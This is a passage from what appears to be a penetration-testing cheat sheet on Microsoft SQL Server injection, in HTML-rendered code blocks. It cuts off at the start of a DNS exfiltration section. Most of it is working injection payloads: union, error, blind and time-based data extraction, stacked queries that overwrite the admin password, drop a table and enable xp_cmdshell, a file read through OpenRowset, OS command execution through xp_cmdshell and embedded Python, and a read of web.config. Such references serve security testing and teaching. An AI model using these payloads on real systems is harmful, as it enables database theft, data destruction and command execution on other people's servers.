<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">.</span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="n">TYPE_NAME</span><span class="p">(</span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">.</span><span class="n">xtype</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">,</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">.</span><span class="n">id</span><span class="o">=</span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="p">.</span><span class="n">id</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="p">.</span><span class="n">name</span><span class="o">=</span><span class="err"></span><span class="n">sometable</span><span class="err"></span><span class="p">;</span><span class="w"> </span><span class="err"></span><span class="w"> </span><span class="n">list</span><span class="w"> </span><span class="n">colum</span><span class="w"> </span><span class="k">names</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="n">types</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sometable</span>
<a id="__codelineno-7-3" name="__codelineno-7-3" href="#__codelineno-7-3"></a>
<a id="__codelineno-7-4" name="__codelineno-7-4" href="#__codelineno-7-4"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">table_catalog</span><span class="p">,</span><span class="w"> </span><span class="k">column_name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span>
</code></pre></div>
<h2 id="mssql-list-tables">MSSQL List tables</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">xtype</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="err"></span><span class="n">U</span><span class="err"></span><span class="p">;</span><span class="w"> </span><span class="err"></span><span class="w"> </span><span class="n">use</span><span class="w"> </span><span class="n">xtype</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="err"></span><span class="n">V</span><span class="err"></span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">views</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">someotherdb</span><span class="p">..</span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">xtype</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="err"></span><span class="n">U</span><span class="err"></span><span class="p">;</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">.</span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="n">TYPE_NAME</span><span class="p">(</span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">.</span><span class="n">xtype</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">,</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">syscolumns</span><span class="p">.</span><span class="n">id</span><span class="o">=</span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="p">.</span><span class="n">id</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="p">.</span><span class="n">name</span><span class="o">=</span><span class="err"></span><span class="n">sometable</span><span class="err"></span><span class="p">;</span><span class="w"> </span><span class="err"></span><span class="w"> </span><span class="n">list</span><span class="w"> </span><span class="n">colum</span><span class="w"> </span><span class="k">names</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="n">types</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sometable</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a>
<a id="__codelineno-8-5" name="__codelineno-8-5" href="#__codelineno-8-5"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">table_catalog</span><span class="p">,</span><span class="w"> </span><span class="k">table_name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span>
<a id="__codelineno-8-6" name="__codelineno-8-6" href="#__codelineno-8-6"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">STRING_AGG</span><span class="p">(</span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;, &#39;</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">xtype</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;U&#39;</span><span class="p">;</span><span class="w"> </span><span class="c1">-- Change delimeter value such as &#39;, &#39; to anything else you want =&gt; trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)</span>
</code></pre></div>
<h2 id="mssql-union-based">MSSQL Union Based</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="c1">-- extract databases names</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="err">$</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysdatabases</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">Injection</span>
<a id="__codelineno-9-4" name="__codelineno-9-4" href="#__codelineno-9-4"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">msdb</span>
<a id="__codelineno-9-5" name="__codelineno-9-5" href="#__codelineno-9-5"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">tempdb</span>
<a id="__codelineno-9-6" name="__codelineno-9-6" href="#__codelineno-9-6"></a>
<a id="__codelineno-9-7" name="__codelineno-9-7" href="#__codelineno-9-7"></a><span class="c1">-- extract tables from Injection database</span>
<a id="__codelineno-9-8" name="__codelineno-9-8" href="#__codelineno-9-8"></a><span class="err">$</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">Injection</span><span class="p">..</span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">xtype</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;U&#39;</span>
<a id="__codelineno-9-9" name="__codelineno-9-9" href="#__codelineno-9-9"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">Profiles</span>
<a id="__codelineno-9-10" name="__codelineno-9-10" href="#__codelineno-9-10"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">Roles</span>
<a id="__codelineno-9-11" name="__codelineno-9-11" href="#__codelineno-9-11"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">Users</span>
<a id="__codelineno-9-12" name="__codelineno-9-12" href="#__codelineno-9-12"></a>
<a id="__codelineno-9-13" name="__codelineno-9-13" href="#__codelineno-9-13"></a><span class="c1">-- extract columns for the table Users</span>
<a id="__codelineno-9-14" name="__codelineno-9-14" href="#__codelineno-9-14"></a><span class="err">$</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">syscolumns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;Users&#39;</span><span class="p">)</span>
<a id="__codelineno-9-15" name="__codelineno-9-15" href="#__codelineno-9-15"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">UserId</span>
<a id="__codelineno-9-16" name="__codelineno-9-16" href="#__codelineno-9-16"></a><span class="p">[</span><span class="o">*</span><span class="p">]</span><span class="w"> </span><span class="n">UserName</span>
<a id="__codelineno-9-17" name="__codelineno-9-17" href="#__codelineno-9-17"></a>
<a id="__codelineno-9-18" name="__codelineno-9-18" href="#__codelineno-9-18"></a><span class="c1">-- Finally extract the data</span>
<a id="__codelineno-9-19" name="__codelineno-9-19" href="#__codelineno-9-19"></a><span class="err">$</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">UserId</span><span class="p">,</span><span class="w"> </span><span class="n">UserName</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">Users</span>
</code></pre></div>
<h2 id="mssql-error-based">MSSQL Error based</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="k">For</span><span class="w"> </span><span class="nb">integer</span><span class="w"> </span><span class="n">inputs</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="k">convert</span><span class="p">(</span><span class="nb">int</span><span class="p">,</span><span class="o">@@</span><span class="k">version</span><span class="p">)</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="k">For</span><span class="w"> </span><span class="nb">integer</span><span class="w"> </span><span class="n">inputs</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="k">cast</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span><span class="p">)</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="nb">int</span><span class="p">)</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a><span class="k">For</span><span class="w"> </span><span class="n">string</span><span class="w"> </span><span class="n">inputs</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s1">&#39; + convert(int,@@version) + &#39;</span>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a><span class="k">For</span><span class="w"> </span><span class="n">string</span><span class="w"> </span><span class="n">inputs</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="s1">&#39; + cast((SELECT @@version) as int) + &#39;</span>
</code></pre></div>
<h2 id="mssql-blind-based">MSSQL Blind based</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="k">AND</span><span class="w"> </span><span class="n">LEN</span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">TOP</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="n">username</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">tblusers</span><span class="p">)</span><span class="o">=</span><span class="mi">5</span><span class="w"> </span><span class="p">;</span><span class="w"> </span><span class="c1">-- -</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a>
<a id="__codelineno-11-3" name="__codelineno-11-3" href="#__codelineno-11-3"></a><span class="k">AND</span><span class="w"> </span><span class="n">ASCII</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">TOP</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="n">username</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">tblusers</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="mi">97</span>
<a id="__codelineno-11-4" name="__codelineno-11-4" href="#__codelineno-11-4"></a><span class="k">AND</span><span class="w"> </span><span class="n">UNICODE</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;A&#39;</span><span class="p">),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">))</span><span class="o">&gt;</span><span class="mi">64</span><span class="c1">-- </span>
<a id="__codelineno-11-5" name="__codelineno-11-5" href="#__codelineno-11-5"></a><span class="k">AND</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">SUBSTRING</span><span class="p">(</span><span class="k">table_name</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="s1">&#39;A&#39;</span>
<a id="__codelineno-11-6" name="__codelineno-11-6" href="#__codelineno-11-6"></a>
<a id="__codelineno-11-7" name="__codelineno-11-7" href="#__codelineno-11-7"></a><span class="k">AND</span><span class="w"> </span><span class="k">ISNULL</span><span class="p">(</span><span class="n">ASCII</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">(</span><span class="k">CAST</span><span class="p">((</span><span class="k">SELECT</span><span class="w"> </span><span class="k">LOWER</span><span class="p">(</span><span class="n">db_name</span><span class="p">(</span><span class="mi">0</span><span class="p">)))</span><span class="k">AS</span><span class="w"> </span><span class="nb">varchar</span><span class="p">(</span><span class="mi">8000</span><span class="p">)),</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="mi">0</span><span class="p">)</span><span class="o">&gt;</span><span class="mi">90</span>
<a id="__codelineno-11-8" name="__codelineno-11-8" href="#__codelineno-11-8"></a>
<a id="__codelineno-11-9" name="__codelineno-11-9" href="#__codelineno-11-9"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span><span class="w"> </span><span class="k">LIKE</span><span class="w"> </span><span class="s1">&#39;%12.0.2000.8%&#39;</span>
<a id="__codelineno-11-10" name="__codelineno-11-10" href="#__codelineno-11-10"></a>
<a id="__codelineno-11-11" name="__codelineno-11-11" href="#__codelineno-11-11"></a><span class="k">WITH</span><span class="w"> </span><span class="k">data</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="p">(</span><span class="n">ROW_NUMBER</span><span class="p">()</span><span class="w"> </span><span class="n">OVER</span><span class="w"> </span><span class="p">(</span><span class="k">ORDER</span><span class="w"> </span><span class="k">BY</span><span class="w"> </span><span class="n">message</span><span class="p">))</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="k">row</span><span class="p">,</span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">log_table</span><span class="p">)</span>
<a id="__codelineno-11-12" name="__codelineno-11-12" href="#__codelineno-11-12"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">message</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="k">data</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">row</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">and</span><span class="w"> </span><span class="n">message</span><span class="w"> </span><span class="k">like</span><span class="w"> </span><span class="s1">&#39;t%&#39;</span>
</code></pre></div>
<h2 id="mssql-time-based">MSSQL Time based</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="n">ProductID</span><span class="o">=</span><span class="mi">1</span><span class="p">;</span><span class="n">waitfor</span><span class="w"> </span><span class="n">delay</span><span class="w"> </span><span class="s1">&#39;0:0:10&#39;</span><span class="c1">--</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="n">ProductID</span><span class="o">=</span><span class="mi">1</span><span class="p">);</span><span class="n">waitfor</span><span class="w"> </span><span class="n">delay</span><span class="w"> </span><span class="s1">&#39;0:0:10&#39;</span><span class="c1">--</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="n">ProductID</span><span class="o">=</span><span class="mi">1</span><span class="s1">&#39;;waitfor delay &#39;</span><span class="mi">0</span><span class="p">:</span><span class="mi">0</span><span class="p">:</span><span class="mi">10</span><span class="s1">&#39;--</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a><span class="s1">ProductID=1&#39;</span><span class="p">);</span><span class="n">waitfor</span><span class="w"> </span><span class="n">delay</span><span class="w"> </span><span class="s1">&#39;0:0:10&#39;</span><span class="c1">--</span>
<a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a><span class="n">ProductID</span><span class="o">=</span><span class="mi">1</span><span class="p">));</span><span class="n">waitfor</span><span class="w"> </span><span class="n">delay</span><span class="w"> </span><span class="s1">&#39;0:0:10&#39;</span><span class="c1">--</span>
<a id="__codelineno-12-6" name="__codelineno-12-6" href="#__codelineno-12-6"></a>
<a id="__codelineno-12-7" name="__codelineno-12-7" href="#__codelineno-12-7"></a><span class="k">IF</span><span class="p">([</span><span class="n">INFERENCE</span><span class="p">])</span><span class="w"> </span><span class="n">WAITFOR</span><span class="w"> </span><span class="n">DELAY</span><span class="w"> </span><span class="s1">&#39;0:0:[SLEEPTIME]&#39;</span>
<a id="__codelineno-12-8" name="__codelineno-12-8" href="#__codelineno-12-8"></a><span class="k">IF</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="n">WAITFOR</span><span class="w"> </span><span class="n">DELAY</span><span class="w"> </span><span class="s1">&#39;0:0:5&#39;</span><span class="w"> </span><span class="k">ELSE</span><span class="w"> </span><span class="n">WAITFOR</span><span class="w"> </span><span class="n">DELAY</span><span class="w"> </span><span class="s1">&#39;0:0:0&#39;</span><span class="p">;</span>
</code></pre></div>
<h2 id="mssql-stacked-query">MSSQL Stacked Query</h2>
<ul>
<li>
<p>Without any statement terminator
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="c1">-- multiple SELECT statements</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;A&#39;</span><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;B&#39;</span><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;C&#39;</span>
<a id="__codelineno-13-3" name="__codelineno-13-3" href="#__codelineno-13-3"></a>
<a id="__codelineno-13-4" name="__codelineno-13-4" href="#__codelineno-13-4"></a><span class="c1">-- updating password with a stacked query</span>
<a id="__codelineno-13-5" name="__codelineno-13-5" href="#__codelineno-13-5"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">id</span><span class="p">,</span><span class="w"> </span><span class="n">username</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">username</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;admin&#39;</span><span class="k">exec</span><span class="p">(</span><span class="s1">&#39;update[users]set[password]=&#39;&#39;a&#39;&#39;&#39;</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-13-6" name="__codelineno-13-6" href="#__codelineno-13-6"></a>
<a id="__codelineno-13-7" name="__codelineno-13-7" href="#__codelineno-13-7"></a><span class="c1">-- using the stacked query to enable xp_cmdshell</span>
<a id="__codelineno-13-8" name="__codelineno-13-8" href="#__codelineno-13-8"></a><span class="c1">-- you won&#39;t have the output of the query, redirect it to a file </span>
<a id="__codelineno-13-9" name="__codelineno-13-9" href="#__codelineno-13-9"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">id</span><span class="p">,</span><span class="w"> </span><span class="n">username</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">username</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;admin&#39;</span><span class="k">exec</span><span class="p">(</span><span class="s1">&#39;sp_configure&#39;&#39;show advanced option&#39;&#39;,&#39;&#39;1&#39;&#39;reconfigure&#39;</span><span class="p">)</span><span class="k">exec</span><span class="p">(</span><span class="s1">&#39;sp_configure&#39;&#39;xp_cmdshell&#39;&#39;,&#39;&#39;1&#39;&#39;reconfigure&#39;</span><span class="p">)</span><span class="c1">--</span>
</code></pre></div></p>
</li>
<li>
<p>Use a semi-colon ";" to add another query
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="n">ProductID</span><span class="o">=</span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="k">DROP</span><span class="w"> </span><span class="n">members</span><span class="c1">--</span>
</code></pre></div></p>
</li>
</ul>
<h2 id="mssql-read-file">MSSQL Read file</h2>
<p><strong>Permissions</strong>: The <code>BULK</code> option requires the <code>ADMINISTER BULK OPERATIONS</code> or the <code>ADMINISTER DATABASE BULK OPERATIONS</code> permission.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="o">-</span><span class="mi">1</span><span class="w"> </span><span class="k">union</span><span class="w"> </span><span class="k">select</span><span class="w"> </span><span class="k">null</span><span class="p">,(</span><span class="k">select</span><span class="w"> </span><span class="n">x</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">OpenRowset</span><span class="p">(</span><span class="n">BULK</span><span class="w"> </span><span class="s1">&#39;C:\Windows\win.ini&#39;</span><span class="p">,</span><span class="n">SINGLE_CLOB</span><span class="p">)</span><span class="w"> </span><span class="n">R</span><span class="p">(</span><span class="n">x</span><span class="p">)),</span><span class="k">null</span><span class="p">,</span><span class="k">null</span>
</code></pre></div>
<h2 id="mssql-command-execution">MSSQL Command execution</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">xp_cmdshell</span><span class="w"> </span><span class="ss">&quot;net user&quot;</span><span class="p">;</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">xp_cmdshell</span><span class="w"> </span><span class="s1">&#39;cmd.exe dir c:&#39;</span><span class="p">;</span>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">xp_cmdshell</span><span class="w"> </span><span class="s1">&#39;ping 127.0.0.1&#39;</span><span class="p">;</span>
</code></pre></div>
<p>If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">sp_configure</span><span class="w"> </span><span class="s1">&#39;show advanced options&#39;</span><span class="p">,</span><span class="mi">1</span><span class="p">;</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="n">RECONFIGURE</span><span class="p">;</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">sp_configure</span><span class="w"> </span><span class="s1">&#39;xp_cmdshell&#39;</span><span class="p">,</span><span class="mi">1</span><span class="p">;</span>
<a id="__codelineno-17-4" name="__codelineno-17-4" href="#__codelineno-17-4"></a><span class="n">RECONFIGURE</span><span class="p">;</span>
</code></pre></div>
<p>To interact with the MSSQL instance.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="n">sqsh</span> <span class="n">-S</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">X</span> <span class="n">-U</span> <span class="n">sa</span> <span class="n">-P</span> <span class="n">superPassword</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="n">python</span> <span class="n">mssqlclient</span><span class="p">.</span><span class="n">py</span> <span class="n">WORKGROUP</span><span class="p">/</span><span class="n">Administrator</span><span class="p">:</span><span class="n">password</span><span class="nv">@192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1X</span> <span class="n">-port</span> <span class="n">46758</span>
</code></pre></div>
<p>Execute Python script </p>
<blockquote>
<p>Executed by a different user than the one using xp_cmdshell to execute commands</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="c">#Print the user being used (and execute commands)</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="n">EXECUTE</span> <span class="n">sp_execute_external_script</span> <span class="nv">@language</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;Python&#39;</span><span class="p">,</span> <span class="nv">@script</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;print(__import__(&quot;getpass&quot;).getuser())&#39;</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="n">EXECUTE</span> <span class="n">sp_execute_external_script</span> <span class="nv">@language</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;Python&#39;</span><span class="p">,</span> <span class="nv">@script</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;print(__import__(&quot;os&quot;).system(&quot;whoami&quot;))&#39;</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="c">#Open and read a file</span>
<a id="__codelineno-19-5" name="__codelineno-19-5" href="#__codelineno-19-5"></a><span class="n">EXECUTE</span> <span class="n">sp_execute_external_script</span> <span class="nv">@language</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;Python&#39;</span><span class="p">,</span> <span class="nv">@script</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;print(open(&quot;C:\\inetpub\\wwwroot\\web.config&quot;, &quot;r&quot;).read())&#39;</span>
<a id="__codelineno-19-6" name="__codelineno-19-6" href="#__codelineno-19-6"></a><span class="c">#Multiline</span>
<a id="__codelineno-19-7" name="__codelineno-19-7" href="#__codelineno-19-7"></a><span class="n">EXECUTE</span> <span class="n">sp_execute_external_script</span> <span class="nv">@language</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;Python&#39;</span><span class="p">,</span> <span class="nv">@script</span> <span class="p">=</span> <span class="n">N</span><span class="s1">&#39;</span>
<a id="__codelineno-19-8" name="__codelineno-19-8" href="#__codelineno-19-8"></a><span class="s1">import sys</span>
<a id="__codelineno-19-9" name="__codelineno-19-9" href="#__codelineno-19-9"></a><span class="s1">print(sys.version)</span>
<a id="__codelineno-19-10" name="__codelineno-19-10" href="#__codelineno-19-10"></a><span class="s1">&#39;</span>
<a id="__codelineno-19-11" name="__codelineno-19-11" href="#__codelineno-19-11"></a><span class="n">GO</span>
</code></pre></div>
<h2 id="mssql-out-of-band">MSSQL Out of band</h2>
<h3 id="mssql-dns-exfiltration">MSSQL DNS exfiltration</h3>
<p>Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="c"># Permissions: Requires VIEW SERVER STATE permission on the server.</span>
